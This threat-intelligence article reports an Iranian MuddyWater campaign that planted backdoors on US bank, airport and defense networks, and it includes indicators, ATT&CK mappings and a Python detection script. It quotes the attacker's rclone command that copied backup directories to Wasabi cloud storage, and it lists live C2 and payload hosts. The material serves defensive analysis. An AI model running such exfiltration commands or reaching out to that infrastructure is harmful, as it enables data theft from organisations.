MuddyWater Pre-Positions Dindoor and Fakeset Backdoors on US Bank, Airport, Defense Networks

Mar 5, 2026 · US bank & airport · Iranian APT

CRITICAL PRIMARY SOURCE

By Karim El Labban · ZERO|TOLERANCE

Iran's MuddyWater - the MOIS-directed APT group tracked as Seedworm (Symantec), Earth Vetala (Trend Micro), Mango Sandstorm (Microsoft), and MUDDYCOAST (NATO) - embedded two novel backdoors on the networks of a US bank, a US airport, a US defense software company with Israeli operations, and two non-profit organizations in the US and Canada.

The intrusions began in early February 2026, weeks before the February 28 US-Israeli military strikes on Iran. By the time airstrikes commenced, Iranian intelligence had already established persistent access inside American critical infrastructure.

Symantec's Broadcom Threat Hunter Team published its findings on March 5, 2026, disclosing that the group was "in a potentially dangerous position to launch attacks" given the established network presence.

01

KEY FACTS

  • What: Iranian state-directed APT pre-positioned two novel backdoors - Dindoor (Deno-based) and Fakeset (Python-based) - on US critical infrastructure networks before military hostilities began.
  • Who: Five victim organizations - a US bank, a US airport, a US defense software company with Israeli operations, a Canadian non-profit, and a US non-profit. All unnamed in reporting.
  • How: Initial access method not disclosed. Dindoor delivered via Deno runtime; Fakeset downloaded from Backblaze B2 cloud storage. Both signed with code-signing certificates linked to MuddyWater's historical operations.
  • Data: Intelligence value of persistent access to banking systems, airport operations, and defense supply chain networks. Data exfiltration attempted via Rclone to Wasabi cloud storage.
  • Actor: MuddyWater / Seedworm - assessed with high confidence as operating under Iran's Ministry of Intelligence and Security (MOIS). Attribution established through certificate reuse, infrastructure patterns, and Sliver C2 framework deployment.
  • Impact: Strategic pre-positioning for potential destructive or intelligence operations. Symantec disrupted the identified breaches but warned other organizations remain vulnerable.

02

WHAT HAPPENED

In early February 2026, MuddyWater initiated a coordinated intrusion campaign against five organizations across the United States, Canada, and Israel. The targets were not random.

A US bank, a US airport, and a US software company supplying technology to the defense and aerospace industries - with operations in Israel - represent textbook intelligence and pre-positioning targets for a state actor anticipating military conflict.

Two non-profit organizations - one in the US, one in Canada - rounded out the target set, though their specific strategic value has not been disclosed.

The group deployed two distinct backdoors across the victim set. Dindoor - a novel backdoor leveraging the Deno JavaScript/TypeScript runtime - was deployed on the networks of the defense software company's Israeli operations, the US bank, and the Canadian non-profit.

Fakeset - a Python-based backdoor - was deployed on the airport and US non-profit networks.

The operational separation of tooling across targets suggests deliberate compartmentalization: if one backdoor is detected and signatures are published, the other remains undetected on different victim networks.

On February 28, 2026, the US and Israel commenced military strikes against Iran. MuddyWater was already inside these networks. The pre-positioning timeline is critical - and extends further back than the intrusions themselves.

Independent infrastructure analysis confirms that moonzonet.com, one of the three C2 domains used in this campaign, had its first certificate issued on January 14, 2026 - a full six weeks before the February 28 military strikes.

Domain registration and certificate provisioning for the remaining infrastructure followed in a staggered pattern through late January and late February, indicating a deliberate, phased buildup of operational infrastructure well before hostilities began.

This is consistent with Iranian doctrine of pre-positioning cyber capabilities on adversary infrastructure as a deterrent and retaliatory option during periods of escalating geopolitical tension.

By March 2, 2026, researchers confirmed that MuddyWater's Sliver command-and-control infrastructure remained active on port 31337 at 157.20.182[.]49.

The use of "disrupted" rather than "contained" implies the group may retain access to networks beyond the five identified victims. Activity continued after publication.

Passive reconnaissance of the C2 infrastructure reveals an additional detail that may bear on the undisclosed initial access vector.

Shodan cached data shows port 4443 on the same C2 server (157.20.182[.]49) running an HTTPS service with a self-signed certificate bearing the common name "fortigate-client" - with a validity window of exactly one day: February 15 to February 16, 2026. The single-day certificate lifespan suggests infrastructure provisioned for a specific, time-limited operation during the early phase of the campaign.

The "fortigate-client" naming is consistent with MuddyWater's documented history of deploying fake VPN login portals for credential harvesting.

While this does not confirm the initial access method, it raises a plausible hypothesis: MuddyWater may have used FortiGate-impersonating phishing infrastructure to capture VPN credentials from target organizations during the February intrusion window.

03

THREAT ACTOR

MuddyWater is one of Iran's most prolific and persistent cyber espionage groups. Symantec tracks the group as Seedworm. Additional designations include Earth Vetala (Trend Micro), Mango Sandstorm (Microsoft, formerly Mercury), Static Kitten (CrowdStrike), and MUDDYCOAST (NATO).

The group has been active since at least 2017 and is assessed with high confidence by multiple intelligence agencies and security firms as operating under the direction of Iran's Ministry of Intelligence and Security (MOIS) - the civilian intelligence arm of the Iranian government.

MuddyWater's historical targeting has focused heavily on the Middle East, particularly government, telecommunications, energy, and defense sectors in Saudi Arabia, UAE, Bahrain, Turkey, Iraq, and Israel.

The Dindoor/Fakeset campaign represents a significant geographic expansion into US and Canadian critical infrastructure - a shift that aligns with the escalation of the US-Iran conflict following the February 28 military strikes.

The attribution chain for this campaign is strong, resting on multiple reinforcing indicators. Code-signing certificates provide one direct link. Both Dindoor and Fakeset samples were signed with a certificate issued to "Amy Cherne" - a previously unseen identity.

Fakeset samples were additionally signed with a second certificate, issued to "Donald Gay". This second certificate is the critical forensic artifact: the "Donald Gay" certificate was previously used to sign Stagecomp and Darkcomp malware, both of which have been independently attributed to MuddyWater/Seedworm by Google, Microsoft, and Kaspersky.

Certificate reuse across malware families establishes direct operational lineage between legacy and current MuddyWater tooling.

However, the certificate evidence warrants a note of caution.

Check Point Research, in a report published approximately March 10, 2026, documented that the "Amy Cherne" and "Donald Gay" certificates also appear across samples associated with CastleLoader - a Malware-as-a-Service ecosystem used by multiple criminal affiliates.

Check Point assessed that both MuddyWater and CastleLoader operators may have obtained certificates from the same source, rather than the certificates being exclusively MuddyWater tools.

This does not invalidate the MuddyWater attribution - Symantec's assessment rests on more than certificates alone, including behavioral patterns consistent with prior MuddyWater campaigns, infrastructure deployment methods, Sliver C2 framework usage, and MOIS operational patterns.

But analysts should be aware that certificate-based pivoting in isolation can lead to what Check Point described as "misattribution and flawed clustering" of unrelated activities.

This campaign is the companion piece to Operation Olalampo - a separate MuddyWater offensive documented by Group-IB on January 26, 2026, targeting government and enterprise organizations across the MENA region.

Olalampo deploys entirely different malware families: GhostFetch, CHAR (a Rust-based backdoor), HTTP_VIP, and GhostBackDoor, with Telegram-based command-and-control and confirmed AI-assisted malware development.

The Dindoor/Fakeset campaign uses Deno/Python backdoors with Sliver C2 and Backblaze/Wasabi cloud infrastructure. No direct infrastructure overlap has been confirmed between the two campaigns.

The dual-theater picture is stark: MuddyWater is simultaneously running an espionage campaign across MENA governments (Olalampo) and pre-positioning on US/Canadian/Israeli critical infrastructure (Dindoor/Fakeset) - two concurrent operations with different toolsets, different targets, and different objectives, managed by the same MOIS-directed group during a period of active military conflict between their sponsor state and the United States.

04

WHAT WAS EXPOSED

The intelligence value of persistent access to these five networks extends far beyond traditional data theft:

  • US Bank - Access to a US financial institution provides visibility into transaction flows, account structures, correspondent banking relationships, and potentially SWIFT messaging. In a conflict scenario, this access could enable sanctions evasion intelligence, financial disruption, or pre-positioning for destructive attacks against financial infrastructure.
  • US Airport - Airport network access provides visibility into passenger manifests, flight schedules, security screening procedures, access control systems, baggage handling, and potentially TSA/DHS integration points. For a state intelligence service, this data supports both espionage (tracking individuals of interest) and potential operational planning.
  • US Defense Software Company (Israeli Operations) - A software company supplying technology to defense and aerospace industries represents a supply chain target. Access to its Israeli operations could yield intelligence on Israeli defense technology, procurement processes, and software deployed across defense customers. Source code access would enable vulnerability discovery in defense systems.
  • Non-Profit Organizations (US and Canada) - Non-profits involved in advocacy, policy, or international affairs are common intelligence targets for state actors seeking to understand and influence foreign policy environments.
  • Attempted Data Exfiltration - Symantec observed Fakeset operators attempting to exfiltrate data using Rclone, a command-line cloud storage synchronization tool. The observed command - rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x - targeted backup directories on fixed drives, copying contents to a Wasabi cloud storage bucket. The use of an internal IP address in the destination path suggests the operators were systematically mapping and exfiltrating backups from multiple internal hosts.

05

TECHNICAL FAILURE CHAIN

1. Deno Runtime Evasion. MuddyWater's use of the Deno JavaScript/TypeScript runtime for Dindoor is operationally novel and deliberate.

Enterprise detection controls - EDR signatures, behavioral rules, AMSI hooks, and SOC playbooks - are calibrated for PowerShell, Python, cmd.exe, WScript, CScript, and other well-known scripting frameworks. Deno operates outside these monitored execution contexts.

It is a legitimate developer tool that most endpoint detection platforms do not flag as suspicious, creating a detection blind spot that MuddyWater exploited to maintain persistent access.

Organizations that did not monitor for or restrict Deno execution had no visibility into Dindoor activity.

2. Cloud Storage for Payload Delivery. Fakeset was downloaded from Backblaze B2 cloud storage using two distinct buckets: gitempire.s3.us-east-005.backblazeb2[.]com and elvenforest.s3.us-east-005.backblazeb2[.]com.

Hosting malware on legitimate cloud storage platforms bypasses domain reputation filters, URL categorization, and network security controls that block known-malicious infrastructure. Backblaze B2 traffic appears as legitimate cloud storage access.

Organizations without granular cloud storage visibility had no basis to block or inspect these downloads.

3. Code-Signing Certificate Abuse. Code-signed binaries receive elevated trust from operating systems, endpoint security tools, and application whitelisting solutions.

The certificates were not stolen from a legitimate organization; they were obtained specifically for this campaign.

This indicates MuddyWater has a reliable process for acquiring code-signing certificates - either through fraudulent applications to certificate authorities or through underground marketplaces.

4. Sliver C2 Framework on Non-Standard Port. MuddyWater deployed the Sliver command-and-control framework on port 31337 at 157.20.182[.]49. Sliver is an open-source, cross-platform adversary emulation framework that generates encrypted, mutually authenticated C2 implants.

It supports multiple transport protocols (mTLS, WireGuard, HTTP/S, DNS), making traffic analysis difficult.

Organizations without robust outbound traffic monitoring on non-standard ports - particularly 31337, a port historically associated with exploitation tooling - would not detect this C2 channel.

5. Cloud-to-Cloud Exfiltration via Rclone. Data exfiltration using Rclone to Wasabi cloud storage represents a living-off-the-land technique. Rclone is a legitimate, widely-used tool for cloud storage synchronization. Wasabi is a legitimate, S3-compatible cloud storage provider.

The exfiltration traffic appears as standard HTTPS uploads to a cloud storage provider. Without DLP solutions that inspect cloud storage API calls and correlate them with data classification policies, this exfiltration is invisible.

6. Absence of Application Whitelisting. The successful execution of both Deno-based and Python-based backdoors on victim networks indicates that these environments did not enforce strict application whitelisting.

In a zero-trust architecture, only explicitly authorized executables should run.

Deno.exe, unsigned Python scripts fetched from cloud storage, and Rclone should not execute on banking systems, airport operations networks, or defense software environments without explicit policy exceptions.

7. Compartmentalized Tooling Across Targets. MuddyWater deployed Dindoor on three targets and Fakeset on two, with no overlap. This operational discipline means that detection and signature publication for one backdoor does not immediately compromise the other.

Defenders who discovered Dindoor on one network and searched exclusively for Dindoor IOCs across other environments would miss Fakeset entirely.

This compartmentalization extends to the certificate infrastructure - while both share the "Amy Cherne" certificate, only Fakeset uses the "Donald Gay" certificate, creating asymmetric forensic artifacts.
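The failure chain above describes four behaviours that ordinary endpoint and network telemetry does expose once someone looks for them: a developer runtime such as Deno running outside developer workstations, Rclone copying backup directories to a cloud remote, outbound connections to the Sliver listener on 31337, and downloads from the named Backblaze B2 buckets. The following Python is an added detection example written for this article, not code from Symantec or the incident; the host names, the telemetry records and the developer-workstation allowlist are constructed assumptions, while the indicators are the ones quoted in the text.

```python
"""Correlation rules for the MuddyWater Dindoor/Fakeset tradecraft.

Added example: the Event records below are constructed telemetry in the shape
of EDR process-creation and network-connection logs, not data from the incident.
"""
import re
from dataclasses import dataclass

# Indicators quoted in the article (defanged forms are refanged before matching).
C2_IP = "157.20.182.49"
C2_PORT = 31337
C2_DOMAINS = {"uppdatefile.com", "serialmenot.com", "moonzonet.com"}
PAYLOAD_HOSTS = {
    "gitempire.s3.us-east-005.backblazeb2.com",
    "elvenforest.s3.us-east-005.backblazeb2.com",
}
# Runtimes the article lists as outside the usual monitored scripting contexts.
UNMONITORED_RUNTIMES = {"deno.exe", "deno", "bun.exe", "bun"}
# Assumption: hosts where a developer runtime is expected (set per environment).
DEV_WORKSTATIONS = {"DEV-WS-01"}


@dataclass
class Event:
    host: str
    kind: str            # "process" or "network"
    image: str = ""      # process image file name
    cmdline: str = ""
    dest_ip: str = ""
    dest_port: int = 0
    dest_host: str = ""


@dataclass
class Alert:
    host: str
    rule: str
    detail: str


def refang(value: str) -> str:
    return value.replace("[.]", ".").lower()


def detect(events):
    """Return one Alert per matching rule; unmatched events produce nothing."""
    alerts = []
    for e in events:
        image, cmd = e.image.lower(), e.cmdline.lower()
        if e.kind == "process":
            if image in UNMONITORED_RUNTIMES and e.host not in DEV_WORKSTATIONS:
                alerts.append(Alert(e.host, "T1059.007 unmonitored runtime", e.cmdline))
            # Shape of the observed command: rclone copy <backup dir> <cloud remote>:
            if image in ("rclone.exe", "rclone") and re.search(r"\b(copy|sync|move)\b", cmd):
                if "backup" in cmd and re.search(r"\b(wasabi|s3|b2)\w*:", cmd):
                    alerts.append(Alert(e.host, "T1567.002 rclone exfil to cloud storage", e.cmdline))
        elif e.kind == "network":
            host = refang(e.dest_host)
            if e.dest_ip == C2_IP or e.dest_port == C2_PORT:
                alerts.append(Alert(e.host, "T1571 Sliver C2 on non-standard port",
                                    f"{e.dest_ip}:{e.dest_port}"))
            if host in PAYLOAD_HOSTS or host in C2_DOMAINS:
                alerts.append(Alert(e.host, "known C2/payload host", host))
            elif host.endswith(".backblazeb2.com"):
                alerts.append(Alert(e.host, "unapproved cloud storage host (review)", host))
    return alerts


# Constructed sample telemetry: one benign developer event, one benign web event,
# and four events mirroring the behaviours described in the failure chain.
SAMPLE_EVENTS = [
    Event("BANK-FS-02", "process", image="deno.exe",
          cmdline="deno.exe run -A C:\\Users\\Public\\update.ts"),
    Event("DEV-WS-01", "process", image="deno.exe", cmdline="deno run main.ts"),
    Event("AIRPORT-OPS-07", "process", image="rclone.exe",
          cmdline="rclone copy CSIDL_DRIVE_FIXED\\backups wasabi:[REMOVED]:/192.168.0.x"),
    Event("BANK-FS-02", "network", dest_ip="157.20.182.49", dest_port=31337),
    Event("AIRPORT-OPS-07", "network",
          dest_host="gitempire.s3.us-east-005.backblazeb2[.]com", dest_port=443),
    Event("HR-WS-11", "network", dest_host="www.example.com", dest_port=443),
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a.host:15} {a.rule:45} {a.detail}")
```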

06

INDICATORS OF COMPROMISE

Malicious Domains:

  • uppdatefile[.]com - C2 domain (registered Feb 26, 2026 via Tucows, Cloudflare NS)
  • serialmenot[.]com - C2 domain (registered Jan 31, 2026 via NiceNIC, Cloudflare NS)
  • moonzonet[.]com - C2 domain (registered Jan 14, 2026 via Tucows, Cloudflare NS)
  • gitempire.s3.us-east-005.backblazeb2[.]com - Backblaze B2 bucket for Fakeset payload delivery
  • elvenforest.s3.us-east-005.backblazeb2[.]com - Backblaze B2 bucket for Fakeset payload delivery

IP Addresses:

  • 157[.]20[.]182[.]49 - Sliver C2 server, port 31337 (Hosterdaddy, AS152485, Netherlands)

C2 Infrastructure:

  • Sliver C2 framework on port 31337/TCP with TLS cert CN=multiplayer
  • Port 4443/TCP - FortiGate-impersonating HTTPS (self-signed cert, Feb 15-16, 2026)
  • Port 8888/TCP - Python 3.12.3 SimpleHTTPServer
  • Rclone exfiltration to Wasabi cloud storage

Code-Signing Certificates:

  • Certificate issued to "Amy Cherne" - signed Dindoor and Fakeset samples
  • Certificate issued to "Donald Gay" - signed Fakeset, Stagecomp, and Darkcomp samples

Tools Used:

  • Dindoor - Novel Deno-based backdoor
  • Fakeset - Python-based backdoor
  • Sliver C2 framework (open-source)
  • Rclone - Cloud sync used for exfiltration to Wasabi
  • Backblaze B2 - Payload hosting

Threat Actor Aliases:

  • MuddyWater / Seedworm (Symantec) / Earth Vetala (Trend Micro) / Mango Sandstorm (Microsoft) / Static Kitten (CrowdStrike)

07

MITRE ATT&CK:

  • T1059.007 - JavaScript via Deno runtime
  • T1059.006 - Python (Fakeset)
  • T1071.001 - Web Protocols (Sliver C2)
  • T1567.002 - Exfiltration to Cloud Storage (Rclone/Wasabi)
  • T1553.002 - Code Signing (Amy Cherne/Donald Gay certs)
  • T1571 - Non-Standard Port (31337)

08

REGULATORY EXPOSURE

  • CISA/Critical Infrastructure Mandate: Under Presidential Policy Directive 21 (PPD-21) and the National Cybersecurity Strategy (March 2023), financial services and transportation (including airports) are designated critical infrastructure sectors. The compromise of a US bank and US airport by a state-sponsored threat actor during active military conflict triggers mandatory reporting obligations to CISA and sector-specific agencies (Treasury/OCC for banking, TSA for aviation). CISA's Shields Up guidance - issued specifically for Iranian cyber threats - requires heightened vigilance and reporting.
  • TSA Security Directives (Aviation): TSA issued cybersecurity requirements for airport and airline operators (SD 1580/82-2022) mandating network segmentation, access control measures, continuous monitoring, and incident reporting to CISA within 24 hours. Persistent APT access to an airport network for weeks indicates potential non-compliance with these directives.
  • Bank Secrecy Act / OCC Requirements (Banking): The Office of the Comptroller of the Currency requires national banks and federal savings associations to report cybersecurity incidents that materially affect operations, confidentiality of data, or ability to deliver services. The 2022 Computer-Security Incident Notification Rule requires banking organizations to notify their primary federal regulator within 36 hours of determining that a material cybersecurity incident has occurred.
  • SEC Regulation S-P / 8-K (if publicly traded): If the affected bank or software company is publicly traded, SEC Rule 10b-5 and the December 2023 cybersecurity incident disclosure rules require 8-K filing within four business days of determining materiality. State-sponsored pre-positioning on financial and defense networks is material.
  • ITAR / EAR (Defense Software Company): A software company supplying technology to defense and aerospace industries is likely subject to International Traffic in Arms Regulations (ITAR) or Export Administration Regulations (EAR). Unauthorized foreign government access to controlled technical data constitutes a potential ITAR violation reportable to the Directorate of Defense Trade Controls (DDTC). Penalties include fines up to $1.3 million per violation and potential debarment.
  • CFIUS Implications (Israeli Operations): Foreign government cyber access to a US defense software company's Israeli operations may trigger Committee on Foreign Investment in the United States review considerations, particularly regarding technology transfer and national security risks.
  • Executive Order 13694 / IEEPA (Iranian Sanctions): The US Treasury's Office of Foreign Assets Control maintains comprehensive sanctions on Iran. Any interaction with or facilitation of MOIS operations - even unknowingly through compromised infrastructure - creates compliance exposure for the affected organizations.
  • CCPA/CPRA (California): If the affected bank or non-profits maintain personal information of California residents and data was exfiltrated, CCPA notification obligations apply. Fines reach $7,500 per intentional violation.
  • State Breach Notification Laws: If personal data was exfiltrated from the bank or non-profits, breach notification obligations exist in all 50 states. The Rclone exfiltration attempts targeting backup directories suggest data theft was actively underway.
  • Canadian PIPEDA (Canadian Non-Profit): The compromise of a Canadian non-profit triggers obligations under the Personal Information Protection and Electronic Documents Act. Organizations must report breaches involving personal information that pose a "real risk of significant harm" to the Privacy Commissioner of Canada.

09

INTELLIGENCE GAPS

The following gaps exist in the public record for this incident. Independent infrastructure analysis has partially addressed several of these, as noted:

1. The initial access vector for all five intrusions has not been disclosed by Symantec.

However, passive reconnaissance of the C2 server reveals a FortiGate-impersonating HTTPS service on port 4443 with a single-day certificate (February 15-16, 2026), raising a credible hypothesis that MuddyWater used fake VPN portal credential harvesting - consistent with the group's documented tactics.

This remains unconfirmed but narrows the field of likely initial access methods.

2. The identities of all five victim organizations remain undisclosed - the US bank, US airport, US defense software company, Canadian non-profit, and US non-profit are unnamed in all reporting.

3. Whether MuddyWater successfully exfiltrated data via Rclone to Wasabi cloud storage has not been confirmed - Symantec reported the exfiltration was "attempted" using the observed Rclone command, but did not confirm data was successfully transferred.

4. Symantec's statement that it "disrupted" the breaches rather than "contained" them has not been clarified.

Independent monitoring confirms the C2 infrastructure remained active after disclosure - moonzonet.com certificates were renewed March 14, uppdatefile.com WHOIS was updated March 8, and all services on 157.20.182[.]49 were still live as of March 7. This strongly suggests the operators retain capability and may still have access to networks beyond the five identified victims.

5. The strategic value and specific function of the two non-profit organizations (US and Canadian) targeted alongside critical infrastructure have not been disclosed, leaving the rationale for their targeting unexplained.

6. The relationship between MuddyWater's tooling and the CastleLoader Malware-as-a-Service ecosystem - documented by Check Point Research - remains unresolved.

Whether the shared code-signing certificates represent direct MuddyWater procurement, a common underground supplier, or operational collaboration between Iranian state actors and Russian cybercriminal operators has significant implications for both attribution methodology and threat modeling.

10

ZERO|TOLERANCE Advisory

Weeks of undetected access.

That is how long MuddyWater maintained persistent presence inside a US bank, a US airport, a US defense software company, and two non-profit organizations before detection - with infrastructure preparation traceable to mid-January 2026, six full weeks before the February 28 military strikes.

The group did not use novel zero-day exploits or advanced exploitation techniques.

It used legitimate runtimes that enterprise security tools do not monitor, legitimate cloud storage that network controls do not block, an encrypted C2 channel on a port that egress filters did not restrict, and a legitimate cloud synchronization tool to exfiltrate data.

Every step exploited the same architectural assumption: that security controls calibrated for known-malicious tooling will catch novel tooling built from legitimate components.

The foundational gap is application execution control. Deno falls outside the runtimes that enterprise security stacks are built to monitor - the Technical Failure Chain above explains why. The response is not to add Deno-specific signatures and wait for the next novel runtime.

The response is default-deny execution policy: on banking systems, airport operations networks, and defense environments, only explicitly authorized binaries execute - everything else is blocked and logged.

Implement this through AppLocker or WDAC on Windows endpoints and SELinux/AppArmor application profiles on Linux hosts. Layer CrowdStrike Falcon Device Control or Carbon Black App Control for runtime-level enforcement that covers both operating systems centrally.

Audit existing execution policies quarterly against an updated inventory of developer runtimes - Deno, Bun, Zig, Nim, and whatever ships next - and verify that none are permitted outside developer workstations with explicit policy exceptions.

Deno.exe on a bank's production infrastructure has no legitimate reason to exist. Neither does the next runtime an APT group adopts. Default-deny eliminates the entire category of threat rather than chasing each new tool individually.

Both payload delivery and data exfiltration used legitimate cloud infrastructure that network controls treated as trusted. Rclone copied backup directories to Wasabi cloud storage, systematically exfiltrating data from multiple internal hosts.

A Cloud Access Security Broker - Netskope, Zscaler, or Microsoft Defender for Cloud Apps - providing visibility into cloud storage API calls by service, bucket, and file type would have distinguished between approved instances and the attacker's unknown buckets.

DLP policies scoped to Rclone execution targeting backup directories and uploading to unapproved destinations should trigger immediate alerting and automatic blocking.

MuddyWater operated Sliver C2 on port 31337 at 157.20.182[.]49 - a port that should never carry legitimate outbound traffic from critical infrastructure.

Default-deny egress firewall rules restricting outbound connections to approved ports and requiring all traffic to traverse an inspecting proxy with protocol validation would have blocked the channel before it established.

Once MuddyWater's C2 is active, the group has command-and-control over the compromised host - the control point is preventing the connection in the first place.

Symantec published 20 Dindoor hashes, 11 Fakeset hashes, the Backblaze delivery domains, the C2 domains (uppdatefile[.]com, serialmenot[.]com, moonzonet[.]com), and the Sliver C2 IP at 157.20.182[.]49:31337. These indicators should be deployed into SIEM correlation rules, EDR detection policies, and network detection systems the same day they are published.

Symantec warned that organizations beyond the five identified victims remain at risk - and independent infrastructure analysis confirms that warning remains active.

Post-disclosure monitoring shows moonzonet.com certificates were renewed on March 14, 2026 - nine days after Symantec published its report. The WHOIS record for uppdatefile.com was updated on March 8, three days after disclosure.

Shodan last observed all services on 157.20.182[.]49 - including the Sliver C2 listener on port 31337 - as active on March 7. The operators did not abandon their infrastructure after public exposure.

Defenders should treat these IOCs as live and actively monitored by the threat actor.

Microsegmentation between corporate IT and operational systems is the last control that determines whether a compromised endpoint is an incident or a national security crisis.

The pre-positioning value of this campaign was the potential to reach SWIFT infrastructure at the bank, passenger manifests and access control systems at the airport, and source code repositories at the defense contractor.

Identity-aware microsegmentation - Illumio, Guardicore, or Zscaler Private Access - prevents lateral movement from a compromised user endpoint to operational systems.

Even if every other control fails, segmentation ensures the attacker reaches a wall between the corporate network and the systems that make these organizations critical infrastructure.

11

SOURCES

Symantec/Broadcom Threat Hunter Team, Check Point Research, The Register, The Hacker News, SecurityWeek, Help Net Security, Infosecurity Magazine, Security Affairs, Cybernews, SOCRadar, Krypt3ia, Shodan, crt.sh, WHOIS/RDAP
